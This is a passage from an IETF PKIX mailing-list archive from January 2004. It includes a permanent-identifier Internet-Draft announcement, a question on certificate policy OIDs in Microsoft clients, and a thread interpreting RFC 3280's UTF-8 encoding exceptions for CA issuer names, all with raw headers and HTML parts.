Denis > > >>jim >> >> >> >> >>>-----Original Message----- >>>From: owner-ietf-pkix@mail.imc.org >>>[mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of >>>Internet-Drafts@ietf.org >>>Sent: Wednesday, January 21, 2004 1:27 PM >>>To: IETF-Announce: >>>Cc: ietf-pkix@imc.org >>>Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt >>> >>> >>>A New Internet-Draft is available from the on-line >>>Internet-Drafts directories. This draft is a work item of the >>>Public-Key Infrastructure (X.509) Working Group of the IETF. >>> >>> Title : Internet X.509 Public Key >>>Infrastructure Permanent Identifier >>> Author(s) : D. Pinkas, T. Gindin >>> Filename : draft-ietf-pkix-pi-08.txt >>> Pages : 12 >>> Date : 2004-1-21 >>> >>>This document define a new form of name, called permanent >>>identifier, that may be included in the subjectAltName extension >>>of a public key certificate issued to an entity. >>>The permanent identifier is an optional feature that may be used >>>by a CA to indicate that the certificate relates to the same >>>entity even if the name or the affiliation of that entity stored >>>in the subject or another name form in the subjectAltName extension >>>has changed. >>>The subject name, carried in the subject field, is only unique >>>for each subject entity certified by the one CA as defined by the >>>issuer name field. Also, the new name form can carry a >>>name that is unique for each subject entity certified by a CA. >>> >>>A URL for this Internet-Draft is: >>>http://www.ietf.org/internet-drafts/draft-> ietf-pkix-pi-08.txt >>> >>> >>>To remove yourself from the IETF >>>Announcement list, send a message to >>>ietf-announce-request with the word unsubscribe in the body >>>of the message. >>> >>>Internet-Drafts are also available by anonymous FTP. Login >>>with the username "anonymous" and a password of your e-mail >>>address. After logging in, type "cd internet-drafts" and then >>> "get draft-ietf-pkix-pi-08.txt". >>> >>>A list of Internet-Drafts directories can be found in >> >>http://www.ietf.org/shadow.html >>or ftp://ftp.ietf.org/ietf/1shadow-sites.txt >> >> >>Internet-Drafts can also be obtained by e-mail. >> >>Send a message to: >> mailserv@ietf.org. >>In the body type: >> "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". >> >>NOTE: The mail server at ietf.org can return the document in >> MIME-encoded form by using the "mpack" utility. To use this >> feature, insert the command "ENCODING mime" before the "FILE" >> command. To decode the response(s), you will need "munpack" or >> a MIME-compliant mail reader. Different MIME-compliant mail readers >> exhibit different behavior, especially when dealing with >> "multipart" MIME messages (i.e. documents which have been split >> up into multiple messages), so check your local documentation on >> how to manipulate these messages. >> >> >>Below is the data which will enable a MIME compliant mail reader >>implementation to automatically retrieve the ASCII version of the >>Internet-Draft. >> >> > > > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RAoKnG010329; Tue, 27 Jan 2004 02:50:20 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0RAoKTQ010321; Tue, 27 Jan 2004 02:50:20 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av5-2-sn4.m-sp.skanova.net (av5-2-sn4.m-sp.skanova.net [81.228.10.111]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0RAoI33010247 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 02:50:19 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av5-2-sn4.m-sp.skanova.net (Postfix, from userid 502) id 74EC837E42; Tue, 27 Jan 2004 11:50:07 +0100 (CET) Received: from smtp2-1-sn4.m-sp.skanova.net (smtp2-1-sn4.m-sp.skanova.net [81.228.10.183]) by av5-2-sn4.m-sp.skanova.net (Postfix) with ESMTP id 6749237E42 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 11:50:07 +0100 (CET) Received: from arport (t7o913p27.telia.com [213.64.26.27]) by smtp2-1-sn4.m-sp.skanova.net (Postfix) with SMTP id 3CFD937E4C for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 11:50:06 +0100 (CET) Message-ID: <020201c3e4c2$90d03b60$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: <ietf-pkix@imc.org> Subject: Setting X.509 Policy Data in IE, IIS, Outlook Date: Tue, 27 Jan 2004 11:44:38 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> It has been touted that policy OIDs are essntial for building PKIs. However, I have not found any place where you can can set the policy filtering in relying party apps like MSIE, IIS, or Outlook. I would be interested to know when this feature will be available and how the policy-OID-related processes are supposed to work from an end-user perspective. In case there are such application features available from other vendors, I would be interested in how they have addresses this issue. In particular, what you do after "installing" a trust anhcor does not seem to be an not entirely straightforward matter unless you do a lot of assumptions. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0R9eVYl006780; Tue, 27 Jan 2004 01:40:31 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0R9eVor006779; Tue, 27 Jan 2004 01:40:31 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail-dub.microsoft.com (mail-dub.microsoft.com [213.199.128.160]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0R9eSQM006767 for <ietf-pkix@imc.org>; Tue, 27 Jan 2004 01:40:28 -0800 (PST) (envelope-from stefans@microsoft.com) Received: from dub-imc-01.europe.corp.microsoft.com ([65.53.196.35]) by mail-dub.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Mon, 26 Jan 2004 23:41:42 +0000 Received: from 65.53.196.35 by dub-imc-01.europe.corp.microsoft.com (InterScan E-Mail VirusWall NT); Mon, 26 Jan 2004 23:41:31 -0000 Received: from eur-imc-02.europe.corp.microsoft.com ([65.53.196.43]) by dub-imc-01.europe.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Mon, 26 Jan 2004 22:41:34 +0000 Received: from eur-imc-02.europe.corp.microsoft.com ([65.53.196.43]) by eur-imc-02.europe.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Mon, 26 Jan 2004 22:40:45 +0000 Received: from 65.53.196.43 by eur-imc-02.europe.corp.microsoft.com (InterScan E-Mail VirusWall NT); Mon, 26 Jan 2004 22:40:33 -0000 Received: from EUR-MSG-03.europe.corp.microsoft.com ([65.53.192.44]) by eur-imc-02.europe.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Mon, 26 Jan 2004 21:01:48 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7122.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="------------InterScan_NT_MIME_Boundary" Subject: RE: UTF-8 encoding after December 31 2003 Date: Mon, 26 Jan 2004 21:01:56 -0000 Message-ID: <0C3042E92D8A714783E2C44AB9936E1DB13908@EUR-MSG-03.europe.corp.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: UTF-8 encoding after December 31 2003 Thread-Index: AcPkSt2EonOMqV7tQseYNc5gcUk/BAAAOHLg From: "Stefan Santesson" <stefans@microsoft.com> To: <jimsch@exmsft.com>, <ietf-pkix@imc.org> X-OriginalArrivalTime: 26 Jan 2004 21:01:48.0164 (UTC) FILETIME=[9CDACC40:01C3E44F] Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This is a multi-part message in MIME format. --------------InterScan_NT_MIME_Boundary Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C3E44F.A06C8DD1" ------_=_NextPart_001_01C3E44F.A06C8DD1 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Jim =20 I hope you are right. =20 However I have read it back and forth numerous of times and I have not been able to conclude for sure that you are right even though I have made my best efforts to do so. =20 My strict reading is that first you must violate RFC 3280 and issue certs with old encoded issuer names, THEN you are allowed to use the exception rule to issue a matching CA cert. I would like to have it stated the other way around. =20 I.e: A CA MUST issue certificates with an Issuer field that match the subject name of the CA certificate it has selected for its operation, regardless of encoding. (or similar wording). =20 =20 Is my English knowledge fooling me here or is there someone lese having problem with RFC 3280? =20 /Stefan =20 ________________________________ From: Jim Schaad [mailto:jimsch@nwlink.com]=20 Sent: den 26 januari 2004 21:32 To: Stefan Santesson; ietf-pkix@imc.org Subject: RE: UTF-8 encoding after December 31 2003 =20 Stefan, =20 I don't read (b) in the same way as you do. I read this as saying if a CA has a certificate with a non-UTF8 encoded subject name, then the issuer name in all certificates it issues MUST be the non-UTF8 subject name of the CA. This means you don't need to update the CA certificate, but that all new certificates issued by the CA must be using UTF8 strings. =20 jim -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Stefan Santesson Sent: Monday, January 26, 2004 9:23 AM To: ietf-pkix@imc.org Subject: UTF-8 encoding after December 31 2003 All, =20 I have a problem with the UTF-8 requirements in RFC 3280 after December 31, and would appreciate guidance on interpretation of RFC 3280 as well as other implementers view on this. =20 The situation: =20 Conforming CA:s must encode attributes of DirectotyString types as UTF-8 after=20 December 31, 2003. =20 Exceptions are stated in RFC 3280 (section 4.1.2.4): =20 Exceptions to the December 31, 2003 UTF8 encoding requirements are as follows: =20 (a) CAs MAY issue "name rollover" certificates to support an orderly migration to UTF8String encoding. Such certificates would include the CA's UTF8String encoded name as issuer and and the old name encoding as subject, or vice-versa. =20 (b) As stated in section 4.1.2.6, the subject field MUST be populated with a non-empty distinguished name matching the contents of the issuer field in all certificates issued by the subject CA regardless of encoding. =20 =20 My interpretation of this is: =20 a) only applies for self issued certificates with the same CA name as issuer and subject (but in different encodings). Introducing such name roll-over certificates extend the certificate chain and may be problematic since it may break both naming and path length constraints expressed by chaining CAs. =20 b) seams to be a catch 22. You can populate the subject field with old encoding to match old encoded issuer names in descending certificates, but since no descending CA can populate the issuer field with old encoding it doesn't really apply. =20 =20 The issue: There seems to be a problem with practical reality here in case the interpretation above is correct. =20 Question 1) What if I have a Root CA valid to 2020 with subject and issuer name in old encoding? =20 Can that Root CA issue an intermediary CA certificate with the issuer field in old encoding, matching the subject field of the current root CA Certificate? =20 Question 2) What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the issuer name in old encoding, matching the encoding of the current CA certificate until it expires, or must this CA change its name and have its CA certificate renewed before December 31? =20 If RFC 3280 prevents operating CAs to issue certificates with the issuer field matching the CA:s current certificate, until it expires, then we face a huge legacy problem. Especially since name matching for different encoding types are not required. =20 4.1.2.4 states "(a) attribute values encoded in different types (e.g., PrintableString and BMPString) MAY be assumed to represent different strings;" =20 =20 If my concerns are wrong and the issuing such certificates is allowed, then this needs to be clarified. =20 =20 =20 Stefan Santesson Program Manager, Windows Security =20 ------_=_NextPart_001_01C3E44F.A06C8DD1 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" = xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <!--[if !mso]> <style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--> <title>Message</title> <style> <!-- /* Font Definitions */ @font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0cm; margin-bottom:.0001pt; font-size:10.0pt; font-family:"Courier New";} span.EmailStyle18 {mso-style-type:personal; font-family:Arial; color:windowtext;} span.EmailStyle20 {mso-style-type:personal-reply; font-family:Arial; color:navy;} @page Section1 {size:612.0pt 792.0pt; margin:70.85pt 70.85pt 70.85pt 70.85pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Jim<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>I hope you are = right.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>However I have read it back and = forth numerous of times and I have not been able to conclude for sure that you are = right even though I have made my best efforts to do = so.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>My strict reading is that first you = must violate RFC 3280 and issue certs with old encoded issuer names, THEN you = are allowed to use the exception rule to issue a matching CA = cert.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>I would like to have it stated the = other way around.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>I.e:<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>A CA MUST issue certificates with = an Issuer field that match the subject name of the CA certificate it has = selected for its operation, regardless of encoding. (or similar = wording).<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Is my English knowledge fooling me = here or is there someone lese having problem with RFC = 3280?<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>/Stefan<o:p></o:p></span></font></p>= <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <div style=3D'border:none;border-left:solid blue 1.5pt;padding:0cm 0cm = 0cm 4.0pt'> <div> <div class=3DMsoNormal align=3Dcenter style=3D'text-align:center'><font = size=3D3 face=3D"Times New Roman"><span style=3D'font-size:12.0pt'> <hr size=3D2 width=3D"100%" align=3Dcenter tabindex=3D-1> </span></font></div> <p class=3DMsoNormal><b><font size=3D2 face=3DTahoma><span = style=3D'font-size:10.0pt; font-family:Tahoma;font-weight:bold'>From:</span></font></b><font = size=3D2 face=3DTahoma><span style=3D'font-size:10.0pt;font-family:Tahoma'> Jim = Schaad [mailto:jimsch@nwlink.com] <br> <b><span style=3D'font-weight:bold'>Sent:</span></b> den 26 januari 2004 = 21:32<br> <b><span style=3D'font-weight:bold'>To:</span></b> Stefan Santesson; ietf-pkix@imc.org<br> <b><span style=3D'font-weight:bold'>Subject:</span></b> RE: UTF-8 = encoding after December 31 2003</span></font><o:p></o:p></p> </div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p> </o:p></span></font></p> <div> <p class=3DMsoNormal><font size=3D2 color=3Dblue face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:blue'>Stefan,</span></font><o:p></o:p></p>= </div> <div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'> <o:p></o:p></span></font></p> </div> <div> <p class=3DMsoNormal><font size=3D2 color=3Dblue face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:blue'>I don't read (b) in the same way as = you do. I read this as saying if a CA has a certificate with a = non-UTF8 encoded subject name, then the issuer name in all certificates it issues = MUST be the non-UTF8 subject name of the CA. This means you don't need = to update the CA certificate, but that all new certificates issued by the = CA must be using UTF8 strings.</span></font><o:p></o:p></p> </div> <div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'> <o:p></o:p></span></font></p> </div> <div> <p class=3DMsoNormal><font size=3D2 color=3Dblue face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:blue'>jim</span></font><o:p></o:p></p> </div> <blockquote style=3D'border:none;border-left:solid blue = 1.5pt;padding:0cm 0cm 0cm 4.0pt; margin-left:3.75pt;margin-top:5.0pt;margin-right:0cm;margin-bottom:5.0pt'= > <p class=3DMsoNormal style=3D'margin-bottom:12.0pt'><font size=3D2 = face=3DTahoma><span style=3D'font-size:10.0pt;font-family:Tahoma'>-----Original = Message-----<br> <b><span style=3D'font-weight:bold'>From:</span></b> = owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] <b><span = style=3D'font-weight:bold'>On Behalf Of </span></b>Stefan Santesson<br> <b><span style=3D'font-weight:bold'>Sent:</span></b> Monday, January 26, = 2004 9:23 AM<br> <b><span style=3D'font-weight:bold'>To:</span></b> ietf-pkix@imc.org<br> <b><span style=3D'font-weight:bold'>Subject:</span></b> UTF-8 encoding = after December 31 2003</span></font><o:p></o:p></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>All,<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>I have a problem with the UTF-8 requirements in RFC 3280 after = December 31, and would appreciate guidance on interpretation of RFC 3280 as well = as other implementers view on this.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>The situation:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Conforming CA:s must encode attributes of DirectotyString types = as UTF-8 after <o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>December 31, 2003.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Exceptions are stated in RFC 3280 (section = 4.1.2.4):<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> Exceptions to the December 31, 2003 UTF8 encoding requirements are as<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> follows:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> (a) CAs MAY issue = "name rollover" certificates to support an<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> orderly migration to UTF8String encoding. Such certificates would<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> include the CA's UTF8String = encoded name as issuer and and the old<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> name encoding as subject, or = vice-versa.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> (b) As stated in section = 4.1.2.6, the subject field MUST be<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> populated with a non-empty = distinguished name matching the<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> contents of the issuer field in = all certificates issued by the<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> subject CA regardless of = encoding.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>My interpretation of this is:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>a) only applies for self issued certificates with the same CA = name as issuer and subject (but in different encodings). Introducing such name roll-over certificates extend the certificate chain and may be = problematic since it may break both naming and path length constraints expressed by chaining CAs.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>b) seams to be a catch 22. You can populate the subject field = with old encoding to match old encoded issuer names in descending certificates, = but since no descending CA can populate the issuer field with old encoding = it doesn’t really apply.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>The issue:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>There seems to be a problem with practical reality here in case = the interpretation above is correct.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Question 1)<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>What if I have a Root CA valid to 2020 with subject and issuer = name in old encoding?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Can that Root CA issue an intermediary CA certificate with the = issuer field in old encoding, matching the subject field of the current root CA Certificate?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Question 2)<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the = issuer name in old encoding, matching the encoding of the current CA = certificate until it expires, or must this CA change its name and have its CA certificate = renewed before December 31?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>If RFC 3280 prevents operating CAs to issue certificates with = the issuer field matching the CA:s current certificate, until it expires, = then we face a huge legacy problem. Especially since name matching for different encoding types are not required.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>4.1.2.4 states<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>“(a) attribute values encoded in different types = (e.g.,<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> PrintableString and BMPString) = MAY be assumed to represent<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> different = strings;”<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>If my concerns are wrong and the issuing such certificates is = allowed, then this needs to be clarified.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><strong><b><font size=3D2 color=3Dolive = face=3DArial><span style=3D'font-size:10.0pt;font-family:Arial;color:olive'>Stefan = Santesson</span></font></b></strong><o:p></o:p></p> <p class=3DMsoNormal><font size=3D2 color=3Dolive face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:olive'>Program Manager, Windows = Security</span></font><o:p></o:p></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p> </o:p></span></font></p> </blockquote> </div> </div> </body> </html> ------_=_NextPart_001_01C3E44F.A06C8DD1-- --------------InterScan_NT_MIME_Boundary-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QMIkTu063101; Mon, 26 Jan 2004 14:18:46 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0QMIksu063100; Mon, 26 Jan 2004 14:18:46 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail4.microsoft.com (mail4.microsoft.com [131.107.3.122]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QMIjb6063092 for <ietf-pkix@imc.org>; Mon, 26 Jan 2004 14:18:45 -0800 (PST) (envelope-from trevorf@windows.microsoft.com) Received: from inet-vrs-04.redmond.corp.microsoft.com ([157.54.8.149]) by mail4.microsoft.com with Microsoft SMTPSVC(6.0.3790.0); Mon, 26 Jan 2004 14:18:42 -0800 Received: from 157.54.6.150 by 